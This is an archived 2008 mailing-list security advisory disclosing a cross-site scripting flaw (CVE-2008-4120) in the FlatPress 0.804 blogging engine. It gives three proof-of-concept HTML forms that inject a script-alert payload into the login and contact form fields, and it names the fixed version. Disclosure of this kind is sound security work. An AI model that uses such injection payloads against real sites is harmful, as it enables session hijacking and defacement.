lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 25 Sep 2008 18:28:38 +0200
From: Fabian Fingerle <fabian@...ensalat.eu>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Cross Site Scripting (XSS) Vulnerabilitiy in flatpress 0.804,
 CVE-2008-4120

Cross Site Scripting (XSS) Vulnerabilitiy in flatpress 0.804,
CVE-2008-4120 

References

http://www.datensalat.eu/~fabian/cve/CVE-2008-4120-flatpress.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4120
http://www.flatpress.org/

Description

FlatPress is an open-source standard-compliant multi-lingual extensible
blogging engine which does not require a DataBase Management System to
work. 

Example

Assuming flatpress is installed on http://localhost/flatpress/, anybody
could inject JavaScript:

<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="user" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="pass" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/flatpress/contact.php">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>

Workaround/Fix

Update to 0.804.1.

Disclosure Timeline

2008-09-25 Vendor contacted
2008-09-25 Vendor released 0.804.1
2008-09-25 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4120 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems. 

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck [0]). It's licensed under the creative commons
attribution license [1].

Fabian Fingerle, 2008-09-25, http://www.fabian-fingerle.de

[0] http://www.hboeck.de
[1] http://creativecommons.org/licenses/by/3.0/de/

Download attachment "signature.asc" of type "application/pgp-signature" (198 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ